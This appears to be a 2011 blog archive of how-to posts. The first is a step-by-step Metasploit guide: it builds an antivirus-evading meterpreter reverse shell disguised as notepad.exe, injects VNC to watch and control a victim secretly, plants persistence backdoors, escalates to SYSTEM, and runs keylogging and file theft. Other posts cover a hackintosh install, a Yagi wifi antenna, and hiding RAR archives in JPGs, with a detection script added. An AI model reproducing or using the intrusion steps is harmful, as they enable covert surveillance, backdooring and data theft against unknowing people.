Tuesday, 10 May 2011

How to Back|Track – Exploit Win7 (VNCinject)

GUIDE EXPLANATION:

Before Starting you need Backtrack get it here: http://9ea3912a.linkbucks.com

Text in {} = Titles

# In front of text = Info
Text in [] = Your Input

# Here are some examples of [] from the guide beneath:

# set LHOST [IP ADDRESS INT.] = set LHOST 192.168.1.15

# rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"

# search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg

# So when you input anything where there is [], remember to remove the []

First start Back|Track

{Shell 1} (Creating Exploit)

Open the konsole
cd /pentest/exploits/framework3
svn up
# To update the metasploit framework
clear

./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADDRESS INT./EXT.] LPORT=[YOUR PORT] R | \
./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -e x86/countdown -c 2 -t raw | \
./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o /root/payload.exe

# If you get an encoder error, use a different EXE or encode it fewer times

# Copy the payload to the target

# If you want to use this over the internet, remember to use your external IP instead of your internal one, and forward the port(s) to your computer
=================================

{Shell 2} (Using Exploit)

cd /pentest/exploits/framework3/
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADDRESS INT.]
set LPORT [PORT] (the one used in msfpayload in Shell 1)
show options
exploit

# Again: if you are going to use this over the internet, this time use your internal IP, not the external one…

# Now we wait for connection, so start the payload on victim computer
=================================

DO NOT CLOSE the meterpreter connection/console we need it to upload the VNCinject…

 

{Shell3}[Preparing the VNCinject payload]

cd /pentest/exploits/framework3/
clear
./msfpayload windows/vncinject/reverse_tcp LHOST=[YOUR IP ADDRESS INT./EXT.] LPORT=[YOUR PORT] R | \
./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -e x86/countdown -c 2 -t raw | \
./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o /root/vncinject.exe

# I recommend using a different port from the one used in Shell 1
==============================

 

{Shell4}[Using VNCinject]

In a different Metasploit Console (REMEMBER DO NOT CLOSE the one with the meterpreter connection)

use exploit/multi/handler
set PAYLOAD windows/vncinject/reverse_tcp
set LHOST [IP ADDRESS INT.]
set LPORT [PORT] (the one used in msfpayload in Shell 3)
show options
exploit


# Now in meterpreter console…
upload /root/vncinject.exe C:\\Users\\[username]\\Documents\\vncinject.exe

# In the local path use single "/" separators; in the remote (Windows) path every "\" must be doubled ("\\")

# Now let's execute vncinject.exe

In the meterpreter console…
execute -f c:\\Users\\[username]\\Documents\\vncinject.exe

Now you wait and it will show the remote desktop… the user doesn't know that you are watching… you have control of the computer, keyboard and mouse, and you can upload and download files through the meterpreter console
================================

 

{Setting up backdoors for future use} (when in meterpreter console)

run metsvc (set backdoor for next time you want in)
(OR THIS)
run persistence -r [YOUR IP ADDRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300
# 300 tells it to send request for connection every 300 sec. "run persistence -h" for more info
***UP- AND DOWNSIDES USING THIS***
METSVC:
VERY BAD: All 3 files it uses get flagged by Norton Internet Security 2011 as a trojan; other AVs may do this too!
BAD: If the IP changes you have to know the new IP to connect back to the victim
GOOD: Easy to use
GOOD: It doesn't require YOUR IP and port!
PERSISTENCE:
BAD: It requires YOUR IP and port!
BAD: Can be more "difficult" to use
GOOD: Flexible
GOOD: Auto connect
ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! Only when you run NPE (Norton Power Eraser) is it detected as bad and removed, and that's a tool you must download separately!
————————————-

 

{GET BACK INTO SYSTEM} (using metsvc in a new terminal)

cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337 (must be this port, as far as I know)
set RHOST [VICTIM IP ADDRESS]
show options (check that your setup is correct)
exploit
————————————

 

{GET BACK INTO SYSTEM} (using persistence in a new terminal)

cd /pentest/exploits/framework3/
svn up
clear
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [IP ADDRESS INT.]
set LPORT [PORT]
# The port set in persistence backdoor
show options
exploit
----------
# Now we wait for connection, it will reconnect to your computer within 300 sec
----------
getuid
# If it shows "NT AUTHORITY\SYSTEM" do the following, otherwise skip to "use priv":

ps
# Find the PID of explorer.exe
steal_token [NUMBER - PID of explorer]
# As far as I know it grants you the same rights as the user running that process
use priv
getsystem

 

Some useful commands for meterpreter

{Search} (in meterpreter console)
search -f *.jpg
# Finding all JPG files on the system


search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg

# Finding all JPG files in a specific folder
search -f test.txt

# Find a specific file on the whole system

 

{Uploading and Downloading} (How I use it)

# Use "ls", "pwd" and "cd" to navigate around - see below under commands
Explanation:
Create a txt file on your BT4 desktop and write anything in it, or nothing, and save it with the name "test.txt". Then in the meterpreter console (after you're connected to the victim), navigate to the desktop of the user currently logged in.
Use "pwd" (without quotes) to check that the path is correct; if it is, type the following:

 

{Upload}

upload /root/test.txt test.txt
# and if you are uploading a file with a space in its name:
upload "/root/test 2.txt" "test 2.txt"

# Or if you're not in the path where you want to upload the file, and want it to be uploaded to another folder:

upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
# Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"

 

{Download}

Explanation:
Now we are going to download the file we just uploaded, "test.txt". Navigate to the folder if you're not already in it, using the "cd", "pwd" and "ls" commands.
Then type:
download test.txt /root/test.txt

# And if you are downloading a file with a space in its name:
download "test 2.txt" "/root/test 2.txt"

# Or if you're not in the path you want to download the file from, but know the exact path and name (from search):
download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
# Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"

 

{Commands} (meterpreter console)

help
# USE THIS!!! That's mostly how I got this knowledge, then I googled the commands to get more info on them
screenshot
# No need to say what it does - remember you must have used "use priv" in meterpreter first
cd [DRIVE:\\FOLDER\\FOLDER]
# You get it - change directory
pwd
# Show what directory you're in
ls
# List the current directory
upload
# See above
download
# See above
search
# See above and Meterpreter Search - this can be used in different consoles!
keyscan_start
# Key sniffer - start
keyscan_dump
# Key sniffer - dump keys while running
keyscan_stop
# Key sniffer - stop

Source: http://t.co/8QptJNZ

Monday, 9 May 2011

How to install OSX 10.6.6 on Hp envy

HP envy 14

  • Install Method: Snow Leopard 10.6.6i
  • Processor: Intel i5 580-M
  • Hard Drive: 500GB- 7200 RPM
  • Memory: 4GB - 1 DIMM (DDR3)
  • Graphics: ATI RADEON 5650
Link to download 10.6.2 and 10.6.6i: http://324160bc.linkbucks.com
Make sure you check the md5 so the file isn't corrupted

Not working - wifi, webcam, and sleep (it crashes; to unfreeze it press the power button again). I also had trouble with USB (just try USBfix), and the graphics card :(

How i installed it:
  • 1- Boot leohazard 10.6.6i and partition your HDD in 2 (the size doesn't matter as long as it's over 10 GB and satisfies your ). Input this to boot the DVD:
-cpus=1 busratio=20   (don't be surprised if it takes time to boot, usually up to 10 min max)
  • 2- One for 10.6.6i and the other one for Windows*/Mac OSX 10.6.2 (10.6.2 will be used to remove the kexts that cause 10.6.6 not to boot)
  • 3- Once it's done you're ready to install 10.6.6
  • PACKAGE to select for 10.6.6:
*Chameleon_Boot_Loader: choose RC5 or RC4 (I prefer RC5 but it's up to you, I don't think it really matters)
    *Kernel: CHECK IT, it's for legacy
    *Drivers
          *Graphics: NONE (exotic doesn't work)
          *Sound: VoodooHDA_0.2.7.2
          *Network:
          *Lan: NForceLan & RTL81XX
          *WLAN: none of them worked for me
    *Laptop: VoodooPS2Trackpad
    *Chipset: I selected AHCIPortinjector & ATAPortinjector & 
JMicronATA
    *Sata_Pata: AHCISATAFix
    *Patches: 
        -DSDT_Patcher
        -NTFS (if you wish to be able to read/write on NTFS)
        -UUID
        -USBFix (you might need it)
    *(X11 if you plan to use it)
  • 4- Now reboot and eject 10.6.6i hazard DVD and insert 10.6.2 hazard (boot on it) (in order  to work delete kext that mess up with graphics)
  • 5- Install 10.6.2 on the empty partition
  • 6- ONLY INSTALL this (do not select any Bootloader you already have one)
* 10.6.2 update combo
        * Kernel: Legacy_Kernel_10.2.0 (others didn't work for me)
        * Graphic_Drivers: NONE 
        * Audio: voodooHDA and AppleHDA 
        * Network: I put BCM5787 (ethernet works)
        * Laptop_Support: INSTALL VOODOOPS2 (or you will be stuck 
to: do you wish to transfer data menu)
        * System_Support: 
               -CMOS_RESET_Fix: Apple RTC
               -SATA_ATA_Fix: AHCI_SATA_Fix
               -SMBIOS Resolver
               -Fakesmc_v1.0
Note: each single time you want to boot OSX 10.6.2 you will have to put (cpus=1 busratio=20). Anyway, you only need 10.6.2 to edit the 10.6.6i files (refer to the 10.6.2 section for what works or not)
  • 7- Once everything is set up, boot into 10.6.2 and navigate to the partition where you installed 10.6.6
  • 8- Navigate to System\Library\Extensions and delete this stuff:
     -AppleIntelHD (there might be 4-5; back them up if you're not sure)
     -ATI5000Controller.kext (or something like that)
     -Pasting ATI5000Controller.kext (from Lion) has been reported to work
  • 9- Reboot, and you're good to go
  • 10- Select the 10.6.6i partition, and before hitting enter input this:
cpus=1 busratio=20 PCIRootUID=1 GraphicsEnable=yes
  • 11- Now if you wish you can wipe 10.6.2 and replace it with Windows, or wipe it and extend your 10.6.6 space; there are so many options
This one is really from me :) 
Source (osx86 wiki):  http://58119105.linkbucks.com

Friday, 6 May 2011

How to build your own YAGI wifi Antenna

YAGI WI-FI ANTENNA DESIGN:

This is the antenna to build when you want results FAST and have just a few inexpensive tools and supplies available. It will extend your wi-fi range well beyond the limits of the dipoles that accompany most routers and some wireless adapters. When connected to a USB wireless adapter the performance is comparable to much more expensive equipment.

Sometimes the perfect antenna for a wi fi network is the one that can be made in an hour's time, is made of inexpensive parts, and yet enables connections over moderate to long distances. The yagi wi fi antenna design depicted here is exactly that! It is computer designed, made of wood and wire, and provides high gain and directivity. The 15 element wi fi antenna provides over 15 dB of gain, while the larger 20 element wi-fi antenna provides over 17 dB of gain. Front to back ratio for both antennas is about 22 dB.

Yagi antennas can be rather difficult to make - elements must be cut to the proper length, and spaced at the correct distance from other elements, or the antenna doesn't work. Before good computer tools were available, a designer used various charts and tables to determine antenna dimensions. These days, however, much of the mind numbing calculation can be carried out in a split second. One excellent tool for crunching design numbers is the W9CF yagi antenna modeler

Figure: the 15 element yagi Wi-Fi antenna dimensions in the W9CF java applet.
Figure: the antenna modeler's list of element lengths and positions.


The on-line antenna modeler initially starts with several examples tailored for operation in the amateur radio bands. One of the best designs is the classic K1FO yagi. By following a few steps, the antenna can be scaled for 802.11 b/g/n frequencies:
  1. Start with the 15 or 20 element K1FO 70cm example.
  2. In the "units" menu, select "Radians."
  3. In the "conductivity" menu, select "Copper."
  4. In the "frequency" field, enter 2450 (MHz) for the center of the wi-fi networking band.
  5. For "Element Diameter", enter 0.08729 (radians).
  6. Click the "calculate" button.
  7. In the "units" menu, select "millimeters."
  8. Note that the element diameter perfectly matches 14 gauge wire!
  9. In the file menu, select "list elements."
The elements list will show each element, from the reflector (element 1, position zero mm), to the last director. Any changes in element diameter or design frequency will need recalculation and the new elements list checked. These dimensions work quite well:
Element data for the 15 Element Yagi Wi-Fi Antenna.

Element              Length (mm)   Position (mm)
1 (Reflector)          59.61           0.00
2 (Driven Element)     58.55          18.34
3 (Director)           55.20          25.75
4 (Director)           53.62          39.51
5 (Director)           52.38          58.55
6 (Director)           51.68          82.19
7 (Director)           50.97         109.70
8 (Director)           50.62         140.74
9 (Director)           50.26         174.60
10 (Director)          49.91         210.94
11 (Director)          49.56         249.38
12 (Director)          49.21         289.60
13 (Director)          48.85         331.39
14 (Director)          48.68         374.25
15 (Director)          48.50         418.52

Element data for the 20 Element Yagi Wi-Fi Antenna.

Element              Length (mm)   Position (mm)
1 (Reflector)          59.96           0.00
2 (Driven Element)     58.91          18.34
3 (Director)           55.56          25.75
4 (Director)           53.97          39.51
5 (Director)           52.73          58.55
6 (Director)           52.03          82.19
7 (Director)           51.32         109.70
8 (Director)           50.97         140.74
9 (Director)           50.61         174.60
10 (Director)          50.26         210.94
11 (Director)          49.91         249.38
12 (Director)          49.56         289.60
13 (Director)          49.21         331.39
14 (Director)          49.03         374.25
15 (Director)          48.85         418.52
16 (Director)          48.68         463.67
17 (Director)          48.50         509.70
18 (Director)          48.32         556.26
19 (Director)          48.15         603.53
20 (Director)          47.97         651.32
Below is a graphic adapted from the modeler which shows element lengths and positions along the boom, measured from the reflector (location zero millimeters). Note that the driven element is depicted in green, and for the wi-fi yagi project, will be a folded dipole. Why a folded dipole? It provides a good impedance match to coaxial cable when used as the yagi wi-fi antenna's driven element.
Figure: 15 element yagi wi-fi antenna plan view.
Figure: 20 element yagi wi-fi antenna plan view.

This high gain wi-fi antenna can be constructed in a couple of hours and requires some measuring, cutting, bending, and bolting of metal. Use caution around the sharp edges. When finished, put it up and enjoy a very durable antenna that provides outstanding wi-fi performance.

YAGI WI-FI ANTENNA PARTS LIST:

  1. A 1.2 meter length of 14 AWG bare, solid copper wire.
  2. One wooden square, 1 cm per side, 50 cm long (70 cm for the 20 element antenna).
  3. Wire cutters.
  4. Metric ruler.
  5. Drill, with 1.6 mm (1/16") bit.
  6. Printed or written template with antenna dimensions.
  7. Ball point pen or fine felt tipped marker.

YAGI WI-FI ANTENNA CONSTRUCTION:

Building the yagi wi-fi antenna will now continue, with preparation of the boom, followed by element mounting. After the elements are mounted, a suitable connector is added, and the antenna is tested over-the-air.
  1. Draw a line as accurately as possible down the center of one side of the wooden boom.
  2. Mark the boom centerline 5 cm from one end. This is the "zero location," where the reflector element (element 1 in the tables above, position 0.00 mm) will be mounted.
  3. Continue down the boom, carefully marking the locations of each element on the centerline.
  4. Carefully drill through the boom at each element's location. Make sure to drill straight through the boom, emerging on the other side still centered and perpendicular.
  5. Cut one element at a time, carefully measuring each element before and after cutting, trimming as necessary for proper length. File the wire ends and make sure the lengths are as accurate as possible!
  6. Press elements through the boom, centering each before moving to the next element.
Figure: element positions marked on the yagi wi-fi antenna boom.
Figure: the reflector element after mounting.
  1. For the driven element, cut a 130 mm length of wire, and make a 180 degree bend 30 mm from one end. Mount in boom, then make a bend 30 mm from other end. Adjust as necessary to create a folded dipole just under 59 mm in length with 5 mm spacing.
  2. Double check all elements, making sure all are centered and parallel.
  3. Attach a pigtail (or connector) to open ends of folded dipole.
Figure: folded dipole prior to mounting in the antenna boom.
Figure: the driven element before the last bend.
Figure: two yagi wi-fi antenna elements mounted in the boom.
After all of the elements are measured, cut, and mounted, the antenna should resemble the finished yagi pictured below. Connect the pigtail or connector to the driven element. Then connect the wi-fi device to the antenna and start checking over-the-air signal strengths. Note that the antenna may be sensitive to polarization: when the antenna seems to bring in the best signal, rotate it to find the best polarization. Mounting the antenna is possible using commonly available hardware, such as 90 degree angle brackets, U bolts, or even velcro.

Figure: closeup of the wi-fi yagi feedpoint. Keep the leads short!
Figure: the completed wi-fi yagi antenna.

YAGI WI-FI ANTENNA TESTING:

For the most practical method of signal checking, consider using a wi-fi auditing utility such as Kismet, Airodump (look for Backtrack 4 linux distro used for pentesting), or Netstumbler. Any of these will produce a rapidly updated received signal strength indication that is useful for comparing or aiming wi-fi directional antennas. Make a set of measurements for any desired wi-fi access points on the original antenna, then make a new set for the yagi wi-fi antenna.
The antenna should exhibit high forward gain and a high front-to-back ratio. A prototype in fact performed as well as the wi-fi 12 turn helical antenna shown elsewhere in these pages. Indeed, the antenna exhibits near the theoretical 15 dB gain, enabling broadband connections at 54 MB/S over a path that at best reached 11 MB/S on an unmodified wi-fi adapter. Again, for ultimate performance over long distance wi-fi links, use a short version of the yagi to feed a parabolic reflector.
Good luck building the yagi wifi antenna, and may you enjoy solid long range connections!

Thursday, 5 May 2011

How to hide files in JPG images

Hi… I’m gonna teach you how to hide files in jpg images… it’s very easy!

You must have winrar installed in your computer!
Download it here: http://bdeda0a9.linkbucks.com
Or just google it :)

Steps to Hide any File behind JPEG image Manually

1. Create a folder on the C drive (C:\Hidden is recommended).

2. Now gather all the files that you want to hide in this folder.

3. Now add all these files to a compressed .rar file using WinRAR
(example: myhiddenfiles.rar).
Note: this rar file should be in the same directory (i.e. C:\Hidden)

4. Now select the JPEG file that you want to use to hide the above content
(say myimage.jpg). Put this image file in the same folder too, that is in C:\Hidden

5. Now open Command Prompt (go to Run and type 'cmd'). Make your working directory C:\Hidden.
(When you open CMD you will get something like C:\Documents and settings\username.
Now type cd.. and press enter, and then again type cd.. and press enter. Now you have something like C:\ in cmd. Now in front of that type cd "Hidden" and press enter.)

6. Now type: "COPY /b myimage.jpg + myhiddenfiles.rar outputimage.jpg" (without quotes). Here myimage.jpg is the picture you want to show, myhiddenfiles.rar is the file to be hidden, and outputimage.jpg is the file which contains both….

7. Now, after you have done this, you will see a file outputimage.jpg in C:\Hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, and it will show the hidden archive…

Source: http://t.co/PlcIROU
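Why the trick works, and how it is spotted: COPY /b just concatenates the bytes, so an image viewer stops at the JPEG end-of-image marker (FF D9) and ignores whatever follows, while WinRAR scans forward for its own "Rar!" signature and opens the archive. The script below is an added example (mine, not part of the original post and not WinRAR's or any other tool's code): it walks the JPEG marker segments to find where the real picture ends and reports whether anything, and which archive type, is appended after it. The sample bytes are constructed inline to mimic the marker structure of a minimal JPEG; they are not a decodable picture.

```python
import struct

# Well-known magic bytes of the formats involved.
JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
RAR4_SIG = b"Rar!\x1a\x07\x00"
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"
ZIP_SIG = b"PK\x03\x04"


def find_jpeg_end(data):
    """Walk the JPEG marker segments from SOI and return the offset just past EOI.

    Returns None if the bytes are not a well-formed marker stream. Segment walking
    is used instead of searching for the last FF D9 because the appended archive
    can itself contain that byte pair.
    """
    if not data.startswith(JPEG_SOI):
        return None
    pos, n = 2, len(data)
    while pos + 2 <= n:
        if data[pos] != 0xFF:
            return None                       # lost marker sync: malformed stream
        marker = data[pos + 1]
        if marker == 0xD9:                    # EOI: the picture ends here
            return pos + 2
        if marker == 0xFF:                    # fill byte in front of a marker
            pos += 1
            continue
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:
            pos += 2                          # TEM / SOI / RSTn carry no length field
            continue
        if pos + 4 > n:
            return None
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seg_len                    # length counts the two length bytes themselves
        if marker == 0xDA:                    # SOS: skip entropy-coded data up to the next marker
            while pos + 1 < n:
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    return None


def inspect_trailing_data(data):
    """Describe anything that follows the JPEG EOI marker."""
    end = find_jpeg_end(data)
    if end is None:
        return {"valid_jpeg": False, "jpeg_end": None, "trailing_bytes": 0, "embedded": None}
    tail = data[end:]
    kind = None
    for name, sig in (("rar5", RAR5_SIG), ("rar4", RAR4_SIG), ("zip", ZIP_SIG)):
        if tail.startswith(sig):
            kind = name
            break
    if kind is None and tail:
        kind = "unknown"
    return {"valid_jpeg": True, "jpeg_end": end, "trailing_bytes": len(tail), "embedded": kind}


def scan_file(path):
    """Convenience wrapper for a file on disk."""
    with open(path, "rb") as fh:
        return inspect_trailing_data(fh.read())


def build_sample_jpeg():
    """Constructed sample: SOI, a JFIF APP0 segment, an SOS segment with a few bytes of
    entropy-coded data (including an escaped FF 00 pair), then EOI. 36 bytes in total;
    it mimics the marker structure of a JPEG but is not a decodable picture."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00" + b"\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    entropy = b"\x12\xff\x00\x34"
    return JPEG_SOI + app0 + sos + entropy + JPEG_EOI


SAMPLE_CLEAN = build_sample_jpeg()
# Constructed carrier: the same bytes COPY /b would produce for image + RAR archive.
SAMPLE_WITH_RAR = SAMPLE_CLEAN + RAR4_SIG + b"constructed archive body"

if __name__ == "__main__":
    print("clean  :", inspect_trailing_data(SAMPLE_CLEAN))
    print("carrier:", inspect_trailing_data(SAMPLE_WITH_RAR))
```

Run it as a script to see the clean and the carrier sample reported side by side; scan_file() does the same for a file on disk. A non-zero trailing_bytes on an image that otherwise renders fine is the tell a content filter or forensic triage would look for, whatever signature (or none) the tail starts with.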